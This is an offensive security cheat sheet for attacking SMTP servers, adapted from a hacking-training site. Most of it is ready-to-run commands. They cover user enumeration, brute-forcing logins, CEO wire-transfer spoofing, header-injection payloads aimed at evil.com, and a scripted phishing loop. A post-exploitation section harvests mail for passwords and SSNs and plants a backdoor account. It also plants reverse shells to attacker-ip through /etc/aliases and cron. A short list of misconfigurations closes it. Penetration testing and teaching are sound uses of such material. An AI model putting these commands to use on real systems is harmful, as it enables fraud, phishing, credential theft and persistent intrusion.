// notes/ Service Enumeration
✉️
SMTP — Enumeration & Attacks
Connect, enumerate users (VRFY/EXPN/RCPT), open-relay testing, spoofing, injection, brute-force, and post-exploitation on port 25/465/587.
#smtp#port 25#465#587#enumeration#phishing
source · hackviser.com ↗SMTP (Simple Mail Transfer Protocol)
Default Ports: 25 (SMTP), 465 (SMTPS), 587 (Submission)
SMTP is a text-based push protocol used by mail servers to transmit email. It's frequently abused for phishing, spam, user enumeration, spoofing, and information disclosure. Anything internet-facing on 25/465/587 deserves a careful look.
Connect
Using Telnet
bash
$# Connect to SMTP server$telnet target.com 25$ $# Basic SMTP conversation$EHLO attacker.com$MAIL FROM:<sender@attacker.com>$RCPT TO:<victim@target.com>$DATA$Subject: Test$Test message$.$QUITUsing netcat
bash
$nc target.com 25$ $# With SSL (if supported)$openssl s_client -connect target.com:465 -crlf -quietUsing swaks
bash
$# Send test email$swaks --to victim@target.com --from sender@attacker.com --server target.com$ $# With authentication$swaks --to victim@target.com --from user@target.com \$ --auth-user user@target.com --auth-password password \$ --server target.com$ $# With attachment$swaks --to victim@target.com --from sender@attacker.com \$ --attach /path/to/file.pdf \$ --server target.comUsing sendemail
bash
$sendemail -f sender@attacker.com -t victim@target.com \$ -u "Subject" -m "Message body" -s target.com:25$ $# With authentication$sendemail -f user@target.com -t victim@target.com \$ -u "Subject" -m "Message" \$ -s target.com:587 \$ -xu user@target.com -xp passwordRecon
Service Detection with Nmap
bash
$nmap -p 25,465,587 target.comBanner Grabbing
bash
$# netcat$nc target.com 25$echo "EHLO test" | nc target.com 25$ $# telnet$telnet target.com 25$ $# nmap$nmap -p 25 -sV target.comMX Record Discovery
bash
$# Find mail servers for domain$dig +short MX target.com$nslookup -type=MX target.com$host -t MX target.com$ $# All MX records$dig MX target.com$ $# SPF$dig +short TXT target.com | grep "v=spf1"$ $# DMARC$dig +short TXT _dmarc.target.comEnumeration
SMTP Server Assessment
bash
$# Enumerate supported SMTP commands$nmap -p 25 --script smtp-commands target.com$ $# User enumeration via VRFY/EXPN$nmap -p 25 --script smtp-enum-users target.com$ $# Extract NTLM authentication details$nmap -p 25 --script smtp-ntlm-info target.com$ $# Run all SMTP scripts$nmap -p 25,465,587 --script smtp-* target.comUser Enumeration
VRFY
bash
$telnet target.com 25$VRFY admin$VRFY root$VRFY user$ $smtp-user-enum -M VRFY -U users.txt -t target.comEXPN
bash
$telnet target.com 25$EXPN admin$EXPN all$EXPN staff$ $smtp-user-enum -M EXPN -U users.txt -t target.comRCPT TO
bash
$telnet target.com 25$MAIL FROM:<test@example.com>$RCPT TO:<admin@target.com>$# 250 OK = user exists$# 550 User unknown = doesn't exist$ $smtp-user-enum -M RCPT -U users.txt -t target.com -f sender@example.comCommand Enumeration
bash
$telnet target.com 25$EHLO attacker.com$ $# Response shows:$# 250-SIZE$# 250-VRFY$# 250-ETRN$# 250-STARTTLS$# 250-AUTH PLAIN LOGIN$# 250 HELPAttack Vectors
Open Relay Testing
bash
$# External to external$telnet target.com 25$MAIL FROM:<external1@example.com>$RCPT TO:<external2@anotherdomain.com>$DATA$Test$.$ $# nmap$nmap -p 25 --script smtp-open-relay target.com$ $# swaks$swaks --to external@domain.com --from external@otherdomain.com --server target.comEmail Spoofing
bash
$telnet target.com 25$EHLO attacker.com$MAIL FROM:<ceo@target.com>$RCPT TO:<employee@target.com>$DATA$From: CEO <ceo@target.com>$To: employee@target.com$Subject: Urgent: Wire Transfer$ $Please transfer $50,000 to account XYZ immediately.$.$QUIT$ $# sendemail one-shot$sendemail -f ceo@target.com -t employee@target.com \$ -u "Urgent: Wire Transfer" \$ -m "Please transfer funds..." \$ -s target.com:25SMTP Injection
bash
$# Header injection in web forms that send email$Email: victim@target.com%0ACc:attacker@evil.com$Email: victim@target.com%0ABcc:attacker@evil.com$Email: victim@target.com%0AFrom:admin@target.com$ $# Body injection$Message: Test%0A.%0AMAIL FROM:<attacker@evil.com>%0ARCPT TO:<victim2@target.com>%0ADATA%0APhishing email%0A.$ $# CRLF injection$Subject: Test%0D%0ACc:attacker@evil.comPhishing Campaign
bash
$cat > targets.txt <<EOF$victim1@target.com$victim2@target.com$victim3@target.com$EOF$ $while read email; do$ swaks --to $email \$ --from support@target.com \$ --server target.com \$ --header "Subject: Password Reset Required" \$ --body "Click here: http://evil.com/phishing"$done < targets.txtBrute Force
bash
$# Hydra$hydra -l user@target.com -P passwords.txt smtp://target.com:587$hydra -L users.txt -P passwords.txt smtp://target.com:587$ $# Metasploit$use auxiliary/scanner/smtp/smtp_enum$set RHOSTS target.com$runPost-Exploitation
Email Harvesting
bash
$# Read mail spool$cat /var/mail/username$cat /var/spool/mail/username$ $# Maildir format$ls -la /home/username/Maildir/cur/$cat /home/username/Maildir/cur/*$ $# Pull out all email addresses$grep -Eiorh '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b' /var/mail/*Mail Queue Manipulation
bash
$mailq # view queue$postcat -q QUEUE_ID # read queued message$postfix flush # flush queue$postsuper -d QUEUE_ID # delete one$postsuper -d ALL # delete allData Exfiltration
bash
$grep -r -i "password\|secret\|confidential" /var/mail/$find /var/mail/ -name "*.pdf" -o -name "*.doc" -o -name "*.xls"$grep -r -i "account\|routing\|ssn\|credit" /var/mail/Persistence
bash
$# Backdoor user$useradd -m -s /bin/bash backdoor$echo "backdoor:password" | chpasswd$ $# Alias-based backdoor$echo "backdoor: |/bin/bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'" >> /etc/aliases$newaliases$ $# Cron$echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'" | crontab -Common SMTP Commands
| Command | Description | Usage |
|---|---|---|
HELO | Identify client | HELO client.com |
EHLO | Extended HELO | EHLO client.com |
MAIL FROM | Sender address | MAIL FROM:<sender@domain.com> |
RCPT TO | Recipient | RCPT TO:<recipient@domain.com> |
DATA | Message content | DATA |
VRFY | Verify user | VRFY admin |
EXPN | Expand list | EXPN all |
RSET | Reset | RSET |
NOOP | No operation | NOOP |
QUIT | Close | QUIT |
SMTP Response Codes
| Code | Meaning | Description |
|---|---|---|
| 220 | Service ready | Server ready |
| 250 | OK | Command successful |
| 354 | Start input | Ready for message |
| 421 | Service not available | Server closing |
| 450 | Mailbox unavailable | Temporary failure |
| 550 | Mailbox unavailable | Permanent failure |
| 551 | User not local | Relay denied |
| 552 | Storage exceeded | Quota exceeded |
| 553 | Mailbox name invalid | Bad address |
Useful Tools
| Tool | Description | Primary Use |
|---|---|---|
| telnet | Terminal emulator | Manual testing |
| netcat | Network utility | Connection testing |
| swaks | SMTP test tool | Email sending |
| smtp-user-enum | User enumeration | Finding valid users |
| sendemail | Email sender | Phishing campaigns |
| Metasploit | Exploitation framework | Automated testing |
| Nmap | Network scanner | Service detection |
Security Misconfigurations
- ❌ Open relay configuration
- ❌ VRFY/EXPN enabled
- ❌ No authentication required
- ❌ Weak authentication
- ❌ No SPF/DMARC records
- ❌ No TLS encryption
- ❌ Verbose error messages
- ❌ No rate limiting
- ❌ Information disclosure via NTLM
- ❌ Outdated mail server software
Source: adapted from hackviser.com – SMTP.